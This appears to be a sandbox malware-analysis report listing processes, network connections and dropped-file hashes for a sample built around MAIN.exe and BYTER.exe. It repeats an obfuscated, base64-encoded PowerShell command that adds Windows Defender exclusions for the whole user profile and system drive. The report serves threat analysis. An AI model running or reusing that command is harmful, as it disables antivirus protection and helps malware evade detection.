"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 10.0.2.15:9090 | tcp | |
| N/A | 10.0.2.15:9090 | tcp | |
| US | 147.185.221.19:52033 | tcp | |
| N/A | 10.0.2.15:9090 | tcp | |
| N/A | 10.0.2.15:9090 | tcp |
Files
\Users\Admin\AppData\Local\Temp\MAIN.exe
| MD5 | b8ccfc163e2d56a73b6fd7387a45e6eb |
| SHA1 | f81a368c275574fa808a92d29c5e0b37e01162ce |
| SHA256 | 8386fa61b6c5f873c692fbd3b394851ec714e5c852898ef6f622035e4d3d5e84 |
| SHA512 | 8ea7d2ee4fa1f737e7c77dda98963a1c9d3a3276ab0d0d327b5df41682da91996e2e17cbfdb99ddf9399a819c6ec9cdde18b6a8fe6cf221960103b34acb21faf |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 80a1700a1556374636b66f0cf37fb896 |
| SHA1 | 06c4e78e889740484af9dc317994911874898839 |
| SHA256 | 4e6154400b917feef1d2669c1d0689f3cd6a9efca027ef609bc899d1a701774d |
| SHA512 | efad1f00f5fa05c7542ea298c5cbd37c4d0614857bb060dab9724757921edb5f466000a5addc8dc12ef732cbe8fe80f7e29b271feb7944890a00825969646203 |
memory/3064-10-0x0000000000840000-0x0000000000858000-memory.dmp
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
| MD5 | cf759e4c5f14fe3eec41b87ed756cea8 |
| SHA1 | c27c796bb3c2fac929359563676f4ba1ffada1f5 |
| SHA256 | c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761 |
| SHA512 | c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\tmp4CB9.tmp.bat
| MD5 | 121adb655b15d61edb68c6aec1338f4c |
| SHA1 | 566f7484dba722bd9ae966499bcd2a92a166f67b |
| SHA256 | 65dfcdc48db56cd0fa7d546d0620fa0e770b91e25dc00fcb1331088826099d31 |
| SHA512 | 2ff911374fd156d4e393ad8ba0ebbbb98304811938cd95020bcf5cd87da46b887a3dec689c71d906b48beb75ecac93f40ab4968207e3a10ec72f755b30fe610f |
memory/2996-216-0x0000000000D60000-0x0000000000D78000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp70DC.tmp.bat
| MD5 | fff772dfe52350a0576232e55e59805c |
| SHA1 | 996a55cbd20553b8f76738f97015bf4e895b103a |
| SHA256 | 3d2e03b56acffcb63e7b16dc459e79d42d3952030bf5304cfbac5dd157642f22 |
| SHA512 | bcba2c71c0ab582fe8f7b75dd0c80c731d8db0359c5ab99a61273ee1891fc045c2f89191ca22432012816f19a857c1e86d419f78100a34639296062247a2e6af |
C:\Users\Admin\AppData\Local\Temp\tmp8057.tmp.bat
| MD5 | 8cd26c9c3263815cc0949f451630698c |
| SHA1 | 7d660f5cca2f941b4820db50dc284aa5763a1627 |
| SHA256 | 6ed1435eb5cc7fcef98ae7f663c10f3d4496babcea6cc655b69c13e9b1c3ba21 |
| SHA512 | 463bde66a2250dfdd5cbe96c554ed35ba320aa619fa3736a6d41aedb2b0b6d337c2f215b7017cc2ad56ee58cde4e3f99410f3f44e3954b5d02b10a9ae6d893de |
memory/788-350-0x00000000008D0000-0x00000000008E8000-memory.dmp
memory/2328-781-0x0000000070FD0000-0x0000000071248000-memory.dmp
memory/2328-783-0x00000000713D0000-0x0000000071431000-memory.dmp
memory/2328-785-0x0000000002C90000-0x00000000038DA000-memory.dmp
memory/2328-784-0x0000000073EC0000-0x0000000073EEE000-memory.dmp
memory/2328-782-0x0000000073EF0000-0x0000000073F1F000-memory.dmp